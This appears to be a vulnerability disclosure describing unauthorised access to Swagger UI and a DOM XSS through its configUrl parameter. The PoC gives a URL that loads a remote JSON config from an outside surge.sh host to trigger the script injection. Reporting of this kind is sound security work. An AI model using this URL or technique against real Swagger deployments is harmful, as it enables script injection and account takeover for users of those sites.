IDOR vulnerability lead to DOM XSS #293
Description
Summary
Due to improper access control settings for Swagger-related interfaces, attackers are allowed to access to the internal API documentation, and one of the interfaces contains an XSS vulnerability.
Details
Due to improper access control settings for Swagger-related interfaces, attackers are allowed to access internal API documentation, and one of the interfaces contains an XSS vulnerability.
Swagger UI has an interesting feature that allows you to provide URL to API specification - a yaml or json file that will be fetched and displayed to the user. To do that you have to add query parameter ?url=https://your_api_spec/spec.yaml or ? configUrl=https://your_api_spec/file.json.
The first obvious thing is that if we can bypass the sanitizer(html), we will have really easy DOM XSS thanks to a dangerouslySetInnerHTML. React will simply render ANY HTML and allow us to execute the JS payload.
REFERENCE:
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
POC
IDOR:
http://127.0.0.1:7001/swagger-ui/
XSS
http://127.0.0.1:7002/swagger-ui/index.html?configUrl=https://jumpy-floor.surge.sh/test.json
Impact
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/